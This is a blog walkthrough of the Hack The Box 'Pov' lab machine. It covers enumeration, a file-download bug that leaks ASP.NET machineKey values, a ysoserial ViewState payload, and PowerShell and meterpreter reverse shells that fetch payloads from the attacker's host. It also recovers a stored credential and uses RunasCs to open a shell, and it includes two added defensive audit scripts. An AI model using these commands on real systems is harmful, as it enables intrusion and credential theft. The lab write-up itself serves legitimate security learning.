Trtyr's Blog

Hack The Box - Pov

2024/02/06

Hack The Box lab, Season 4 Week 4: the Pov machine

Target IP: 10.10.11.251

Information gathering

Run an nmap scan:

┌──(kali㉿kali)-[~]
└─$ nmap -sn 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:38 CST
Nmap scan report for 10.10.11.251
Host is up (0.33s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT --min-rate 10000 -p- 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:41 CST
Nmap scan report for 10.10.11.251
Host is up (0.00028s latency).
All 65535 scanned ports on 10.10.11.251 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:41 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.23 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -sTCV -O 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:42 CST
Nmap scan report for 10.10.11.251
Host is up (0.28s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Microsoft Windows XP SP3 (94%), VMware Player virtual NAT device (94%), Actiontec MI424WR-GEN3I WAP (92%), DD-WRT v24-sp2 (Linux 2.4.37) (92%), Linux 3.2 (89%), Linux 4.4 (89%), DVTel DVT-9540DW network camera (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.35 seconds

We get a website.

Web penetration

Directory brute-forcing

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u "http://10.10.11.251/" -i 200
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_10.10.11.251/__24-02-03_15-31-54.txt

Target: http://10.10.11.251/

[15:31:54] Starting:

Task Completed

Nothing found. There is a domain name at the bottom of the page.

Subdomain brute-forcing

Let's try subdomain brute-forcing:

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dns -d pov.htb -w /usr/share/wordlists/seclists/Discovery/DNS/shubs-subdomains.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: pov.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/shubs-subdomains.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
[INFO] [-] Unable to validate base domain: pov.htb (lookup pov.htb: i/o timeout)
Found: dev.pov.htb

Progress: 377 / 484700 (0.08%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 377 / 484700 (0.08%)
===============================================================
Finished
===============================================================

We get the domain dev.pov.htb. Add it to the hosts file and take a look.

Arbitrary file download test

The site lets us download files.

Capture the request with Burp and test it.

The vulnerability exists. Download the web config file.

We get the XML:

<configuration>  
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx"/>
<httpRuntime targetFramework="4.5"/>
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"
validation="SHA1"
validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"/>
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1"/>
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio"
responseMode="Redirect"/>
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false"
childOnly="true"/>
</system.webServer>
</configuration>

One is AES, which we can't do anything with without a key; the other is SHA1, which we couldn't crack.

ViewState deserialization vulnerability

Looking at the characteristics, there may be a ViewState deserialization vulnerability.

For the principle behind the vulnerability, see this article: https://www.cnblogs.com/zpchcbd/p/15112047.html
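What makes the leaked web.config dangerous can be checked mechanically. The following Python script is an added example, not code from the original write-up or from any tool it uses: it parses a constructed copy of the web.config shown above and reports the settings that matter to a defender, namely a hardcoded machineKey, a legacy validation algorithm, a disabled ViewState MAC, and verbose error pages. The function name, severities and wording of the findings are the example's own.

```python
"""Audit an ASP.NET web.config for settings that turn a readable config
file into forgeable ViewState.  Added example, not from the write-up."""
import re
import xml.etree.ElementTree as ET

# Constructed sample built from the web.config shown on the page; the
# key values are the ones the page printed and are only used as input.
SAMPLE_WEB_CONFIG = """<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx"/>
<httpRuntime targetFramework="4.5"/>
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"
validation="SHA1"
validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"/>
</system.web>
<system.webServer>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false"
childOnly="true"/>
</system.webServer>
</configuration>"""

HEX_KEY = re.compile(r"^[0-9A-Fa-f]+$")
# MAC algorithms that ASP.NET still accepts but that are no longer recommended.
LEGACY_VALIDATION = {"SHA1", "MD5", "3DES", "AES"}


def audit_web_config(xml_text):
    """Return a list of (severity, finding) tuples for one web.config."""
    root = ET.fromstring(xml_text)
    findings = []
    system_web = root.find("system.web")
    if system_web is None:
        return [("info", "no <system.web> section")]

    machine_key = system_web.find("machineKey")
    if machine_key is None:
        findings.append(("info", "no <machineKey>: keys are auto-generated, nothing to read from the file"))
    else:
        for attr in ("decryptionKey", "validationKey"):
            value = machine_key.get(attr, "AutoGenerate")
            if value.lower().startswith("autogenerate"):
                continue  # generated per app pool, never stored in the file
            if HEX_KEY.match(value):
                findings.append(("high", f"{attr} is a static {len(value) // 2}-byte key; "
                                         "anyone who can read web.config can sign or decrypt ViewState"))
            else:
                findings.append(("high", f"{attr} has an unrecognised value {value!r}"))
        algo = machine_key.get("validation", "HMACSHA256").upper()
        if algo in LEGACY_VALIDATION:
            findings.append(("medium", f"validation={algo}; HMACSHA256 or stronger is recommended"))

    pages = system_web.find("pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append(("critical", "enableViewStateMac=false: ViewState is accepted without any signature"))

    custom_errors = system_web.find("customErrors")
    if custom_errors is not None and custom_errors.get("mode", "RemoteOnly").lower() == "off":
        findings.append(("low", "customErrors mode=Off shows stack traces and framework details to remote clients"))
    return findings


if __name__ == "__main__":
    for severity, finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"[{severity}] {finding}")
```

A static machineKey is normal on its own (web farms need it); the problem is that it sits in a file the arbitrary file download exposed. Once the file has been read, closing the download bug is not enough: the key must be rotated, because every ViewState signed with the old validationKey stays forgeable until then.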

PowerShell reverse shell

Since the target is a Windows host, use a PowerShell reverse shell.

Online shell generator: https://www.revshells.com/

Note: the IP is the one the VPN assigned to you; make sure you get the subnet right.

Generate the ciphertext with ysoserial

Download ysoserial.exe: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36

./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e 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" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

We get the ciphertext:

BETrzTL1SyqXcduHe0zo2ZqJ33AejOtAFFL%2F6xbIvOcyDK2c3O%2FmCDqD8mYoft72UTCQbJipWAok%2FPMMK6RAYeoK0ZuBJSib3d1BRo630LKmhJrRnsq0hQzT3kfrie2sfKuX5nm6y07wtnnT4b7XtI265kqVB2K8vqNUT9thj4NAnXbXtdj71qWg3wMe3IO0E6CIWWuxDDDQn4WU8S2fUguTl98VEZxEhBHtLRpAJyKLgCvQ%2B4W0HihSBb9p8g9wiVxTlofeuMgquUubk1k1ZKcHawA8RtlohTqXhK9FTUGZyVtKcnVN22TEiJihSnh8A9fc%2Fy8qYpLMEOUY8%2FSh%2BfQ39GLfCmC7x25JYHgLjfR3NrsFP70AaaXrlLLhLddO%2BET53dUyDBE%2FFQO0ZDXrPpw2AyGlsnBQ0cDuw%2Bv4pN3Zon8NWlrGwWcmSTIGbQFDU385sVR5n3Ck4IJUSEX3qGkU5LyiFmUx8%2FMDes3SKSzw3Q96sWZJvKw6Ex8jKErpHOn%2BiPgSMkP8b8HR9wQamC6lxKySvJdQHrS5EBpU3EhYzgOWwKcVIEEgB6dapkN%2Bxkfj3c09hO515LvX2sVIPn14B4D9tIb%2BnsYe3MBmvGdtryQRw247M8%2B4DGvFyvJtDnsp9%2Fvr73RhmTLslzrKou0snokFog42aGVsQsrjSTQW%2FQoik3BAJuy8Ew1naCRcrwXPgpeSWCYqhWFB86RRt8JAzos7iKOmFjA4SmdjVn5FMWN%2BkiFPQYZb8OvKxQEgHamjkH0gPz%2Fss%2BENaqIyEv3x%2B3KxCc5SrRKr5rltBBq7jFXfpAPh9it0aNgAQ172cBOJU%2Bb697whoTQdvjayM3dijpkxDitzoZsK212TT%2FYVDiquJAnf74U6QdovX3kkPk4W%2B8vZLvM3e9kIOOCtfG%2B%2BrCduU%2BoGKk5Af6UMtte%2BvQs2ypNMbLvz3pGqPgVXFGqR8uJNG6NARC2U99dKvGZ%2B0N%2BrdYhTniX9iFzGI0pfDCG9QHvP%2FZV3%2Frh%2Ff68cfFT9TCogpTShpZ2854yMi%2BKFlxvBi7pn4ABqhREc7Dg068ROI5bbmc%2FK4CqJfn2ODq31UuUHxP0NHX7Vj4QfoA2%2FN6djv0E1GfTo%2BprfGRSq7dblE78fN%2BGmGhSTRLdHX3gEVW56hDTSRjZlxDa81d%2BmWn6ohS1ZiHFtMDtFPlwr4v5vQXekVHGrTjwN54Oy5W5PRY8FzKLEMAxy1%2BN4I%2F%2FlotcJ2E0GnQADMrUGMHhbhYI5%2FWWP%2FyHezu6YiOtzLAR2T1DX3Ud8zBTUXYZ2S4H8jeaIpI2FD3QrZn8a48zrRGcUR4YzIH8NsHR11gjBLq8l7HSXkezoYAbSV7%2BYMXeT5FNkkjTjVowCMCGDOMRgks8nNgFuKGMQHP6TA%2BwaGNLTQXhHCWyONuIqnvVcVGb6SfQaAL5zWa6wvKNTYCCglt27%2FJJ6HcBaPfkkbGaZUzFJygckcNkNWK4NwQWY0tJ%2FKXGV5aPzG2%2Fq3QisEmugsfnid5io3onbeH6IsiuaP3KjXmz44twV6Xoxoh0nwCktaE1FmduwzPFIiOySmnDLw3YtEBhKYhWbLFdWZXnChuIHTZWDEsG7Uii4eR0b0uIZxTNxTP2BPegPxWGa%2FhXjjaypXRBt1iyfhdi1Z7ExtSehq6bGoV7gAGYm2keCT2%2BALJ22l3DKoUZzgQbi5kgDVHcxZgf3GyhYKTKVe%2FzsRRLfDQScxAJgg2nUru04IUc0Jho1ENRYapf8gMh2dKciO9mHFVsSM%2BL%2Bj%2Bcjycfplxk3hmfC%2Fx4B40vkhjx3nmhSHNLBeXehqgsHobtBSaH5MhLnjS3iluXUOFnUG6WTNkGiMF%2FeNEJIbKv49VxZp7VV0i7teM
UQ30T1gqKhs7NFIw1vgFbVf2PnUs781YMPJmag5g6PLm4mMwoNjhrIFweSvOL1SEtQmqigzl%2B1RmY4WIi3hEg6uhBPDXX%2BUmfED1H2vuMS64ynLrznJxNRl6HtOXCNi6GcvYFv7aZKUoxk4tNustYHo52ufWX25KyNmqT8CnHXq1maeIWGcECIdPb4iN1dmXLR9Ynp0ikMUWJk%2FSXWc7TufdReqw0fj06iCt5IFNlnSC9CJifK3OAIgNqK2wfkZDRadBkIlf42AYMxfVaMspfSD5b8YbA9PX526U4kcYcPLj78CBIgA6wKrJIV4YMhVmp9TkvgDAXOzqKM9QIMVquyzxdqaUntYXAg%2Fgn8Lt1FN%2B06raMe09cZy076gyGpv2KxUG90f%2B9Zk7Su2uaf6G0ddC6vmex0z1%2Fo6vsU7VmEydIiZzxE1MjOIips8HHB3RpPNdGUzQNT%2F53JLzOBty9NSwZKmGRon%2FbB81tzBy%2FCopRoymOS7GysVa7tbtLP7knisbwrQ5NgGQwk7WAxLd1wGAjYqlrKduyysPnjv1Z5YtQcH%2BwRDdCubmyvvCsHmOANCdPltkjZy%2B9WKJF32DawRalgsCEa3GzW%2BuxCbsMXDQDKfLgPe6D7CCRcbY1hcrN6nLgLPNso3dd8Y%2F7zATC%2Fz96PcwjzXzlSggPH6eisN9TFNXyVzQdNg7cB50WV6N8bArIVxTGGgh1hO2RT6r1K0Ph3ExK%2BvLxwuhas%2F%2Bmvq%2FEXmVbiv4ngNIi65p7cJFtCW9hMIMcjGPUPodG5cqcKd0NMxa4qBQBg4Cm4BPLce2MQ0meOMATDs%2FzTK95QLc5LTq2St9cm55nafPlfnIh1ZnrVmElhxSFmfDEkLRZR9W0H1tCthbELNloxN%2Bbxr9qOAksRPGkNgfN2vOuOr4Zj3Pprc3GDx8MBhRUcZjm2wMWWb1oKe%2B4hyhQPTUHRyY4WutlTwtnUQiWDDgm3WKLobhS02vgwilX5my5w7zG%2B6TDIErWrlJBPgHLnCpn%2FnURTBIrv3VKLy2mIs9pptUWXnHs%2BYtDfQANxeLmhvljE4vK43Mt1UYWKU5%2Fv18IX%2F8EhQvjlk%2BfYKO1CGvfYZsxtt2hNlHcITpqYJrS26SNt9JaNcqFla7%2FrAAP7lTvO1g9oOk8BvFqAJxBHXU%2F3D8g03aVGgk1VZlcjajDyuA%3D%3D

Getting the reverse shell

Start a listener on Kali:

┌──(root㉿Desktop-Trtyr)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...

Resend the request in Burp, replacing __VIEWSTATE with our ciphertext.

Back on Kali, check the listener.

We get a shell.

Internal penetration

Current user

Check the current user:

PS C:\windows\system32\inetsrv> whoami
pov\sfitz

We are currently the sfitz user, so first move into that user's directory before continuing:

cd C:/Users/sfitz

Upload an MSF payload

Because of the VPN, a CS (Cobalt Strike) payload can't be used, so MSF is used here.

Generate a Windows payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.45 LPORT=8888 -f exe -o /root/Tools/payload/hack.exe

Start the handler:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.45
set LPORT 8888

Set up an HTTP server:

python3 -m http.server 80 --bind 10.10.14.45

This gives the payload URL http://10.10.14.45/hack.exe; then have the target fetch it:

Invoke-WebRequest -Uri "http://10.10.14.45:80/hack.exe" -OutFile ".\hack.exe"

We successfully get a shell.

Privilege escalation tests

Initial privilege escalation test

Here we try process migration directly to escalate privileges:

ps

We get a pile of processes, but in the User column we can only see our current user. There is a winlogon.exe, which is the NT user logon program; we migrate into that process:

migrate 544

It failed; this user's privileges are too low.

Switching users in MSF

Browse the Users directory.

There are three users. Look at the Documents folder.

In Documents there is a connection.xml, which contains alaading's account credentials:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">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</SS> </Props>
</Obj>
</Objs>

Use the commands:

$credential = Import-CliXml -Path C:\users\sfitz\documents\connection.xml
$credential.GetNetworkCredential().Password

We get the password f8gQ8fynP44ek1m3.
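connection.xml is a PowerShell Export-CliXml file holding a PSCredential, which is why Import-CliXml as the same user hands the password straight back. The following Python script is an added example, not code from the original write-up or from PowerShell: it scans a directory tree for CliXml exports that contain a PSCredential and reports the file, the UserName and whether a SecureString password is stored, without touching the encrypted blob. The sample file is constructed from the structure above with a placeholder in place of the password, and the function names are the example's own.

```python
"""Find PowerShell CliXml exports that store a PSCredential (the kind of
file connection.xml is).  Added example, not from the write-up."""
import os
import tempfile
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
CREDENTIAL_TYPE = "System.Management.Automation.PSCredential"

# Constructed sample modelled on connection.xml; the <SS> value is a
# placeholder, not a real DPAPI-protected SecureString.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
<Obj RefId="0">
<TN RefId="0">
<T>{CREDENTIAL_TYPE}</T>
<T>System.Object</T>
</TN>
<ToString>{CREDENTIAL_TYPE}</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">PLACEHOLDER_DPAPI_BLOB</SS>
</Props>
</Obj>
</Objs>"""


def find_credentials(xml_text):
    """Return [(username, has_secure_password)] for each PSCredential in a CliXml document."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return []
    if root.tag != f"{{{PS_NS}}}Objs":
        return []  # well-formed XML, but not a PowerShell export
    found = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        type_names = {t.text for t in obj.iterfind(f"./{{{PS_NS}}}TN/{{{PS_NS}}}T")}
        if CREDENTIAL_TYPE not in type_names:
            continue
        username, has_password = None, False
        props = obj.find(f"{{{PS_NS}}}Props")
        if props is not None:
            for prop in props:
                if prop.get("N") == "UserName":
                    username = prop.text
                elif prop.get("N") == "Password":
                    # <SS> is a SecureString serialised as a DPAPI blob; <S> would be plaintext
                    has_password = prop.tag in (f"{{{PS_NS}}}SS", f"{{{PS_NS}}}S")
        found.append((username, has_password))
    return found


def scan_tree(root_dir):
    """Walk root_dir and map each .xml file that holds credentials to its findings."""
    hits = {}
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8-sig") as fh:
                    text = fh.read(1_000_000)  # cap the read; exports are small
            except OSError:
                continue
            creds = find_credentials(text)
            if creds:
                hits[path] = creds
    return hits


def demo():
    """Build a throwaway profile directory and return findings keyed by relative path."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = os.path.join(tmp, "Documents")
        os.makedirs(docs)
        with open(os.path.join(docs, "connection.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CLIXML)
        with open(os.path.join(docs, "notes.xml"), "w", encoding="utf-8") as fh:
            fh.write("<notes><item>nothing here</item></notes>")
        return {os.path.relpath(p, tmp): c for p, c in scan_tree(tmp).items()}


if __name__ == "__main__":
    for path, creds in demo().items():
        for user, has_pw in creds:
            print(f"{path}: PSCredential for {user!r}, password stored={has_pw}")
```

The SecureString in an Export-CliXml file is protected with DPAPI under the exporting user's key, so Import-CliXml only recovers it when run as that user on that host. That is exactly the position the sfitz shell was in, which is why a credential file left in a profile directory is worth finding and removing before someone else does.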

runas /user:alaading /password:f8gQ8fynP44ek1m3 cmd

It failed.

Getting a shell with RunasCs

Get RunasCs and have the target download it:

Invoke-WebRequest -Uri "http://10.10.14.45:80/RunasCs.exe" -OutFile ".\RunasCs.exe"

Open port 4444 on Kali, then run:

.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.45:4444

We're in. Look for the flag.

We get the flag.

MSF privilege escalation

Same routine: run the MSF privilege escalation once more, but this time we are in cmd, so download with curl:

curl -v -o ".\hack.exe" "http://10.10.14.45:80/Tools/payload/hack.exe" 

Success! Just grab the flag.

Submit
